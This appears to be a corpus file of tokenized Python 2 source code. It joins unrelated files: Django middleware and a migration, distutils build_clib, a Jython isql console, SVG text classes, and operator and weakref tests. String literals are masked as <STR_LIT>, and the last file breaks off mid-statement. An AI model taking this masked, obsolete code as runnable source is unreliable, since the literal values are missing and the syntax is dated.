<s> """<STR_LIT>""" <EOL> import re <EOL> from django . conf import settings <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import HttpResponseRedirect <EOL> EXEMPT_URLS = [ re . compile ( settings . LOGIN_URL . lstrip ( '<STR_LIT:/>' ) ) ] <EOL> if hasattr ( settings , '<STR_LIT>' ) : <EOL> EXEMPT_URLS += [ <EOL> re . compile ( exempt_url ) for exempt_url in settings . LOGIN_EXEMPT_URLS ] <EOL> class InviteMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if request . user . is_authenticated ( ) and not request . user . invite_verified : <EOL> path = request . path_info . lstrip ( '<STR_LIT:/>' ) <EOL> if not any ( m . match ( path ) for m in EXEMPT_URLS ) : <EOL> redirect_to = '<STR_LIT>' % ( <EOL> reverse ( '<STR_LIT>' ) , request . path_info ) <EOL> return HttpResponseRedirect ( redirect_to ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False , db_index = True ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = b'<STR_LIT>' , max_length = <NUM_LIT:30> , db_index = True , choices = [ ( b'<STR_LIT:none>' , b"<STR_LIT>" ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) ] ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import os , string <EOL> from types import * <EOL> from distutils . core import Command <EOL> from distutils . errors import * <EOL> from distutils . sysconfig import customize_compiler <EOL> from distutils import log <EOL> def show_compilers ( ) : <EOL> from distutils . ccompiler import show_compilers <EOL> show_compilers ( ) <EOL> class build_clib ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:t>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:g>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:f>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' , <EOL> "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> help_options = [ <EOL> ( '<STR_LIT>' , None , <EOL> "<STR_LIT>" , show_compilers ) , <EOL> ] <EOL> def initialize_options ( self ) : <EOL> self . build_clib = None <EOL> self . build_temp = None <EOL> self . libraries = None <EOL> self . include_dirs = None <EOL> self . define = None <EOL> self . undef = None <EOL> self . debug = None <EOL> self . force = <NUM_LIT:0> <EOL> self . compiler = None <EOL> def finalize_options ( self ) : <EOL> self . set_undefined_options ( '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . libraries = self . distribution . libraries <EOL> if self . libraries : <EOL> self . check_library_list ( self . libraries ) <EOL> if self . include_dirs is None : <EOL> self . include_dirs = self . distribution . include_dirs or [ ] <EOL> if type ( self . include_dirs ) is StringType : <EOL> self . include_dirs = string . split ( self . include_dirs , <EOL> os . pathsep ) <EOL> def run ( self ) : <EOL> if not self . libraries : <EOL> return <EOL> from distutils . ccompiler import new_compiler <EOL> self . compiler = new_compiler ( compiler = self . compiler , <EOL> dry_run = self . dry_run , <EOL> force = self . force ) <EOL> customize_compiler ( self . compiler ) <EOL> if self . include_dirs is not None : <EOL> self . compiler . set_include_dirs ( self . include_dirs ) <EOL> if self . define is not None : <EOL> for ( name , value ) in self . define : <EOL> self . compiler . define_macro ( name , value ) <EOL> if self . undef is not None : <EOL> for macro in self . undef : <EOL> self . compiler . undefine_macro ( macro ) <EOL> self . build_libraries ( self . libraries ) <EOL> def check_library_list ( self , libraries ) : <EOL> """<STR_LIT>""" <EOL> if type ( libraries ) is not ListType : <EOL> raise DistutilsSetupError , "<STR_LIT>" <EOL> for lib in libraries : <EOL> if type ( lib ) is not TupleType and len ( lib ) != <NUM_LIT:2> : <EOL> raise DistutilsSetupError , "<STR_LIT>" <EOL> if type ( lib [ <NUM_LIT:0> ] ) is not StringType : <EOL> raise DistutilsSetupError , "<STR_LIT>" + "<STR_LIT>" <EOL> if '<STR_LIT:/>' in lib [ <NUM_LIT:0> ] or ( os . sep != '<STR_LIT:/>' and os . sep in lib [ <NUM_LIT:0> ] ) : <EOL> raise DistutilsSetupError , ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % lib [ <NUM_LIT:0> ] <EOL> if type ( lib [ <NUM_LIT:1> ] ) is not DictionaryType : <EOL> raise DistutilsSetupError , "<STR_LIT>" + "<STR_LIT>" <EOL> def get_library_names ( self ) : <EOL> if not self . libraries : <EOL> return None <EOL> lib_names = [ ] <EOL> for ( lib_name , build_info ) in self . libraries : <EOL> lib_names . append ( lib_name ) <EOL> return lib_names <EOL> def get_source_files ( self ) : <EOL> self . check_library_list ( self . libraries ) <EOL> filenames = [ ] <EOL> for ( lib_name , build_info ) in self . libraries : <EOL> sources = build_info . get ( '<STR_LIT>' ) <EOL> if ( sources is None or <EOL> type ( sources ) not in ( ListType , TupleType ) ) : <EOL> raise DistutilsSetupError , ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % lib_name <EOL> filenames . extend ( sources ) <EOL> return filenames <EOL> def build_libraries ( self , libraries ) : <EOL> for ( lib_name , build_info ) in libraries : <EOL> sources = build_info . get ( '<STR_LIT>' ) <EOL> if sources is None or type ( sources ) not in ( ListType , TupleType ) : <EOL> raise DistutilsSetupError , ( "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) % lib_name <EOL> sources = list ( sources ) <EOL> log . info ( "<STR_LIT>" , lib_name ) <EOL> macros = build_info . get ( '<STR_LIT>' ) <EOL> include_dirs = build_info . get ( '<STR_LIT>' ) <EOL> objects = self . compiler . compile ( sources , <EOL> output_dir = self . build_temp , <EOL> macros = macros , <EOL> include_dirs = include_dirs , <EOL> debug = self . debug ) <EOL> self . compiler . create_static_lib ( objects , lib_name , <EOL> output_dir = self . build_clib , <EOL> debug = self . debug ) </s>
<s> import dbexts , cmd , sys , os <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> import java . lang . String <EOL> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> class IsqlExit ( Exception ) : pass <EOL> class Prompt : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , isql ) : <EOL> self . isql = isql <EOL> def __str__ ( self ) : <EOL> prompt = "<STR_LIT>" % ( self . isql . db . dbname ) <EOL> if len ( self . isql . sqlbuffer ) > <NUM_LIT:0> : <EOL> prompt = "<STR_LIT>" <EOL> return prompt <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> def __tojava__ ( self , cls ) : <EOL> if cls == java . lang . String : <EOL> return self . __str__ ( ) <EOL> return False <EOL> class IsqlCmd ( cmd . Cmd ) : <EOL> def __init__ ( self , db = None , delimiter = "<STR_LIT:;>" , comment = ( '<STR_LIT:#>' , '<STR_LIT>' ) ) : <EOL> cmd . Cmd . __init__ ( self , completekey = None ) <EOL> if db is None or type ( db ) == type ( "<STR_LIT>" ) : <EOL> self . db = dbexts . dbexts ( db ) <EOL> else : <EOL> self . db = db <EOL> self . kw = { } <EOL> self . sqlbuffer = [ ] <EOL> self . comment = comment <EOL> self . delimiter = delimiter <EOL> self . prompt = Prompt ( self ) <EOL> def parseline ( self , line ) : <EOL> command , arg , line = cmd . Cmd . parseline ( self , line ) <EOL> if command and command < > "<STR_LIT>" : <EOL> command = command . lower ( ) <EOL> return command , arg , line <EOL> def do_which ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> print self . db <EOL> return False <EOL> def do_EOF ( self , arg ) : <EOL> return False <EOL> def do_p ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> exec arg . strip ( ) in globals ( ) <EOL> except : <EOL> print sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> return False <EOL> def do_column ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def do_use ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> self . db = self . db . __class__ ( arg . strip ( ) ) <EOL> return False <EOL> def do_table ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if len ( arg . strip ( ) ) : <EOL> self . db . table ( arg , ** self . kw ) <EOL> else : <EOL> self . db . table ( None , ** self . kw ) <EOL> return False <EOL> def do_proc ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if len ( arg . strip ( ) ) : <EOL> self . db . proc ( arg , ** self . kw ) <EOL> else : <EOL> self . db . proc ( None , ** self . kw ) <EOL> return False <EOL> def do_schema ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> print <EOL> self . db . schema ( arg ) <EOL> print <EOL> return False <EOL> def do_delimiter ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> delimiter = arg . strip ( ) <EOL> if len ( delimiter ) > <NUM_LIT:0> : <EOL> self . delimiter = delimiter <EOL> def do_o ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if not arg : <EOL> fp = self . db . out <EOL> try : <EOL> if fp : <EOL> fp . close ( ) <EOL> finally : <EOL> self . db . out = None <EOL> else : <EOL> fp = open ( arg , "<STR_LIT:w>" ) <EOL> self . db . out = fp <EOL> def do_q ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if self . db . out : <EOL> self . db . out . close ( ) <EOL> finally : <EOL> return True <EOL> def do_set ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if len ( arg . strip ( ) ) == <NUM_LIT:0> : <EOL> items = self . kw . items ( ) <EOL> if len ( items ) : <EOL> print <EOL> for a in dbexts . console ( items , ( "<STR_LIT:key>" , "<STR_LIT:value>" ) ) [ : - <NUM_LIT:1> ] : <EOL> print a <EOL> print <EOL> return False <EOL> d = filter ( lambda x : len ( x ) > <NUM_LIT:0> , map ( lambda x : x . strip ( ) , arg . split ( "<STR_LIT:=>" ) ) ) <EOL> if len ( d ) == <NUM_LIT:1> : <EOL> if self . kw . has_key ( d [ <NUM_LIT:0> ] ) : <EOL> del self . kw [ d [ <NUM_LIT:0> ] ] <EOL> else : <EOL> self . kw [ d [ <NUM_LIT:0> ] ] = eval ( d [ <NUM_LIT:1> ] ) <EOL> def do_i ( self , arg ) : <EOL> fp = open ( arg ) <EOL> try : <EOL> print <EOL> for line in fp . readlines ( ) : <EOL> line = self . precmd ( line ) <EOL> stop = self . onecmd ( line ) <EOL> stop = self . postcmd ( stop , line ) <EOL> finally : <EOL> fp . close ( ) <EOL> return False <EOL> def default ( self , arg ) : <EOL> try : <EOL> token = arg . strip ( ) <EOL> if not token : <EOL> return False <EOL> comment = [ token . startswith ( x ) for x in self . comment ] <EOL> if reduce ( lambda x , y : x or y , comment ) : <EOL> return False <EOL> if token [ <NUM_LIT:0> ] == '<STR_LIT:\\>' : <EOL> token = token [ <NUM_LIT:1> : ] <EOL> if len ( token ) >= len ( self . delimiter ) : <EOL> if token [ - <NUM_LIT:1> * len ( self . delimiter ) : ] == self . delimiter : <EOL> self . sqlbuffer . append ( token [ : - <NUM_LIT:1> * len ( self . delimiter ) ] ) <EOL> if self . sqlbuffer : <EOL> q = "<STR_LIT:U+0020>" . join ( self . sqlbuffer ) <EOL> print q <EOL> self . db . isql ( q , ** self . kw ) <EOL> self . sqlbuffer = [ ] <EOL> if self . db . updatecount : <EOL> print <EOL> if self . db . updatecount == <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" % ( self . db . updatecount ) <EOL> print <EOL> return False <EOL> if token : <EOL> self . sqlbuffer . append ( token ) <EOL> except : <EOL> self . sqlbuffer = [ ] <EOL> print <EOL> print sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> print <EOL> return False <EOL> def emptyline ( self ) : <EOL> return False <EOL> def postloop ( self ) : <EOL> raise IsqlExit ( ) <EOL> def cmdloop ( self , intro = None ) : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> cmd . Cmd . cmdloop ( self , intro ) <EOL> except IsqlExit , e : <EOL> break <EOL> except Exception , e : <EOL> print <EOL> print e <EOL> print <EOL> intro = None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import getopt <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" , [ ] ) <EOL> except getopt . error , msg : <EOL> print <EOL> print msg <EOL> print "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> dbname = None <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> dbname = arg <EOL> intro = "<STR_LIT>" % ( __version__ ) <EOL> isql = IsqlCmd ( dbname ) <EOL> isql . cmdloop ( ) </s>
<s> '''<STR_LIT>''' <EOL> from attributes import * <EOL> from core import BaseElement , PointAttrib , DeltaPointAttrib , RotateAttrib <EOL> class altGlyphDef ( BaseElement , CoreAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> class altGlyphItem ( BaseElement , CoreAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> class glyphRef ( BaseElement , CoreAttrib , ExternalAttrib , StyleAttrib , FontAttrib , XLinkAttrib , PaintAttrib , PointAttrib , DeltaPointAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_glyphRef ( self , glyphRef ) : <EOL> self . _attributes [ '<STR_LIT>' ] = glyphRef <EOL> def get_glyphRef ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_format ( self , format ) : <EOL> self . _attributes [ '<STR_LIT>' ] = format <EOL> def get_format ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class altGlyph ( glyphRef , ConditionalAttrib , GraphicalEventsAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib , RotateAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class textPath ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , XLinkAttrib , FontAttrib , PaintAttrib , GraphicalEventsAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_startOffset ( self , startOffset ) : <EOL> self . _attributes [ '<STR_LIT>' ] = startOffset <EOL> def get_startOffset ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_method ( self , method ) : <EOL> self . _attributes [ '<STR_LIT>' ] = method <EOL> def get_method ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_spacing ( self , spacing ) : <EOL> self . _attributes [ '<STR_LIT>' ] = spacing <EOL> def get_spacing ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class tref ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , XLinkAttrib , PointAttrib , DeltaPointAttrib , RotateAttrib , GraphicalEventsAttrib , PaintAttrib , FontAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class tspan ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , PointAttrib , DeltaPointAttrib , RotateAttrib , GraphicalEventsAttrib , PaintAttrib , FontAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , x = None , y = None , dx = None , dy = None , rotate = None , textLength = None , lengthAdjust = None , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . set_x ( x ) <EOL> self . set_y ( y ) <EOL> self . set_dx ( dx ) <EOL> self . set_dy ( dy ) <EOL> self . set_rotate ( rotate ) <EOL> self . set_textLength ( textLength ) <EOL> self . set_lengthAdjust ( lengthAdjust ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class text ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , PointAttrib , DeltaPointAttrib , RotateAttrib , GraphicalEventsAttrib , PaintAttrib , FontAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib , TextAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , content = None , x = None , y = None , dx = None , dy = None , rotate = None , textLength = None , lengthAdjust = None , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT:text>' ) <EOL> if content < > None : <EOL> self . appendTextContent ( content ) <EOL> self . set_x ( x ) <EOL> self . set_y ( y ) <EOL> self . set_dx ( dx ) <EOL> self . set_dy ( dy ) <EOL> self . set_rotate ( rotate ) <EOL> self . set_textLength ( textLength ) <EOL> self . set_lengthAdjust ( lengthAdjust ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_transform ( self , transform ) : <EOL> self . _attributes [ '<STR_LIT>' ] = transform <EOL> def get_transform ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import operator <EOL> import sys <EOL> import unittest <EOL> from test import test_support <EOL> class OperatorTestCase ( unittest . TestCase ) : <EOL> class NewStyle ( object ) : <EOL> pass <EOL> class OldStyle : <EOL> pass <EOL> class HasGetitem ( object ) : <EOL> def __getitem__ ( self , name ) : <EOL> return '<STR_LIT:foo>' <EOL> class HasInt ( object ) : <EOL> def __int__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> class HasLong ( object ) : <EOL> def __long__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> class HasFloat ( object ) : <EOL> def __float__ ( self ) : <EOL> return <NUM_LIT:1.0> <EOL> tests = ( <EOL> ( type , False , False , False ) , <EOL> ( type . __dict__ , False , True , False ) , <EOL> ( globals ( ) , False , True , False ) , <EOL> ( { } , False , True , False ) , <EOL> ( '<STR_LIT>' , False , False , True ) , <EOL> ( u'<STR_LIT>' , False , False , True ) , <EOL> ( [ ] , False , False , True ) , <EOL> ( ( ) , False , False , True ) , <EOL> ( xrange ( <NUM_LIT:5> ) , False , False , True ) , <EOL> ( set ( ) , False , False , False ) , <EOL> ( frozenset ( ) , False , False , False ) , <EOL> ( <NUM_LIT:1> , True , False , False ) , <EOL> ( <NUM_LIT:2> L , True , False , False ) , <EOL> ( <NUM_LIT> , True , False , False ) , <EOL> ( <NUM_LIT> , True , False , False ) , <EOL> ( None , False , False , False ) , <EOL> ( Ellipsis , False , False , False ) , <EOL> ( Exception ( ) , False , False , True ) , <EOL> ( collections . deque ( ) , False , False , True ) , <EOL> ( collections . defaultdict ( ) , False , True , False ) , <EOL> ( collections . namedtuple ( '<STR_LIT:test>' , '<STR_LIT:t>' ) , False , False , False ) , <EOL> ( NewStyle ( ) , False , False , False ) , <EOL> ( OldStyle ( ) , not sys . platform . startswith ( '<STR_LIT>' ) , False , False ) , <EOL> ( HasGetitem ( ) , False , True , True ) , <EOL> ( HasInt ( ) , True , False , False ) , <EOL> ( HasFloat ( ) , True , False , False ) , <EOL> ) <EOL> def test_isNumberType ( self ) : <EOL> for obj , isNumberType , _ , _ in self . tests : <EOL> self . assert_istype ( operator . isNumberType , obj , isNumberType ) <EOL> def test_isMappingType ( self ) : <EOL> for obj , _ , isMappingType , _ in self . tests : <EOL> self . assert_istype ( operator . isMappingType , obj , isMappingType ) <EOL> def test_isSequenceType ( self ) : <EOL> for obj , _ , _ , isSequenceType in self . tests : <EOL> self . assert_istype ( operator . isSequenceType , obj , isSequenceType ) <EOL> def assert_istype ( self , func , obj , result ) : <EOL> self . assertEqual ( func ( obj ) , result , '<STR_LIT>' % <EOL> ( type ( obj ) , func . __name__ , result ) ) <EOL> def test_main ( ) : <EOL> test_support . run_unittest ( OperatorTestCase ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> import gc <EOL> import sys <EOL> import unittest <EOL> import UserList <EOL> import weakref <EOL> from test import test_support <EOL> if test_support . is_jython : <EOL> import time <EOL> def extra_collect ( ) : <EOL> """<STR_LIT>""" <EOL> gc . collect ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> gc . collect ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> gc . collect ( ) <EOL> else : <EOL> def extra_collect ( ) : <EOL> pass <EOL> ref_from_del = None <EOL> class C : <EOL> def method ( self ) : <EOL> pass <EOL> class Callable : <EOL> bar = None <EOL> def __call__ ( self , x ) : <EOL> self . bar = x <EOL> def create_function ( ) : <EOL> def f ( ) : pass <EOL> return f <EOL> def create_bound_method ( ) : <EOL> return C ( ) . method <EOL> def create_unbound_method ( ) : <EOL> return C . method <EOL> class TestBase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . cbcalled = <NUM_LIT:0> <EOL> def callback ( self , ref ) : <EOL> self . cbcalled += <NUM_LIT:1> <EOL> class ReferencesTestCase ( TestBase ) : <EOL> def test_basic_ref ( self ) : <EOL> self . check_basic_ref ( C ) <EOL> self . check_basic_ref ( create_function ) <EOL> self . check_basic_ref ( create_bound_method ) <EOL> self . check_basic_ref ( create_unbound_method ) <EOL> o = C ( ) <EOL> wr = weakref . ref ( o ) <EOL> ` wr ` <EOL> del o <EOL> ` wr ` <EOL> def test_basic_callback ( self ) : <EOL> self . check_basic_callback ( C ) <EOL> self . check_basic_callback ( create_function ) <EOL> self . check_basic_callback ( create_bound_method ) <EOL> self . check_basic_callback ( create_unbound_method ) <EOL> def test_multiple_callbacks ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o , self . callback ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> del o <EOL> extra_collect ( ) <EOL> self . assert_ ( ref1 ( ) is None , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( ref2 ( ) is None , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( self . cbcalled == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> def test_multiple_selfref_callbacks ( self ) : <EOL> def callback ( object , self = self ) : <EOL> self . ref ( ) <EOL> c = C ( ) <EOL> self . ref = weakref . ref ( c , callback ) <EOL> ref1 = weakref . ref ( c , callback ) <EOL> del c <EOL> def test_proxy_ref ( self ) : <EOL> o = C ( ) <EOL> o . bar = <NUM_LIT:1> <EOL> ref1 = weakref . proxy ( o , self . callback ) <EOL> ref2 = weakref . proxy ( o , self . callback ) <EOL> del o <EOL> def check ( proxy ) : <EOL> proxy . bar <EOL> extra_collect ( ) <EOL> self . assertRaises ( weakref . ReferenceError , check , ref1 ) <EOL> self . assertRaises ( weakref . ReferenceError , check , ref2 ) <EOL> if test_support . is_jython : <EOL> self . assertRaises ( weakref . ReferenceError , bool , ref1 ) <EOL> else : <EOL> self . assertRaises ( weakref . ReferenceError , bool , weakref . proxy ( C ( ) ) ) <EOL> self . assert_ ( self . cbcalled == <NUM_LIT:2> ) <EOL> def check_basic_ref ( self , factory ) : <EOL> o = factory ( ) <EOL> ref = weakref . ref ( o ) <EOL> self . assert_ ( ref ( ) is not None , <EOL> "<STR_LIT>" ) <EOL> o2 = ref ( ) <EOL> self . assert_ ( o is o2 , <EOL> "<STR_LIT>" ) <EOL> def check_basic_callback ( self , factory ) : <EOL> self . cbcalled = <NUM_LIT:0> <EOL> o = factory ( ) <EOL> ref = weakref . ref ( o , self . callback ) <EOL> del o <EOL> extra_collect ( ) <EOL> self . assert_ ( self . cbcalled == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( ref ( ) is None , <EOL> "<STR_LIT>" ) <EOL> def test_ref_reuse ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o ) <EOL> proxy = weakref . proxy ( o ) <EOL> ref2 = weakref . ref ( o ) <EOL> self . assert_ ( ref1 is ref2 , <EOL> "<STR_LIT>" ) <EOL> o = C ( ) <EOL> proxy = weakref . proxy ( o ) <EOL> ref1 = weakref . ref ( o ) <EOL> ref2 = weakref . ref ( o ) <EOL> self . assert_ ( ref1 is ref2 , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> del proxy <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> def test_proxy_reuse ( self ) : <EOL> o = C ( ) <EOL> proxy1 = weakref . proxy ( o ) <EOL> ref = weakref . ref ( o ) <EOL> proxy2 = weakref . proxy ( o ) <EOL> self . assert_ ( proxy1 is proxy2 , <EOL> "<STR_LIT>" ) <EOL> def test_basic_proxy ( self ) : <EOL> o = C ( ) <EOL> self . check_proxy ( o , weakref . proxy ( o ) ) <EOL> L = UserList . UserList ( ) <EOL> p = weakref . proxy ( L ) <EOL> self . failIf ( p , "<STR_LIT>" ) <EOL> p . append ( <NUM_LIT:12> ) <EOL> self . assertEqual ( len ( L ) , <NUM_LIT:1> ) <EOL> self . failUnless ( p , "<STR_LIT>" ) <EOL> p [ : ] = [ <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> self . assertEqual ( len ( L ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( p ) , <NUM_LIT:2> ) <EOL> self . failUnless ( <NUM_LIT:3> in p , <EOL> "<STR_LIT>" ) <EOL> p [ <NUM_LIT:1> ] = <NUM_LIT:5> <EOL> self . assertEqual ( L [ <NUM_LIT:1> ] , <NUM_LIT:5> ) <EOL> self . assertEqual ( p [ <NUM_LIT:1> ] , <NUM_LIT:5> ) <EOL> L2 = UserList . UserList ( L ) <EOL> p2 = weakref . proxy ( L2 ) <EOL> self . assertEqual ( p , p2 ) <EOL> L3 = UserList . UserList ( range ( <NUM_LIT:10> ) ) <EOL> p3 = weakref . 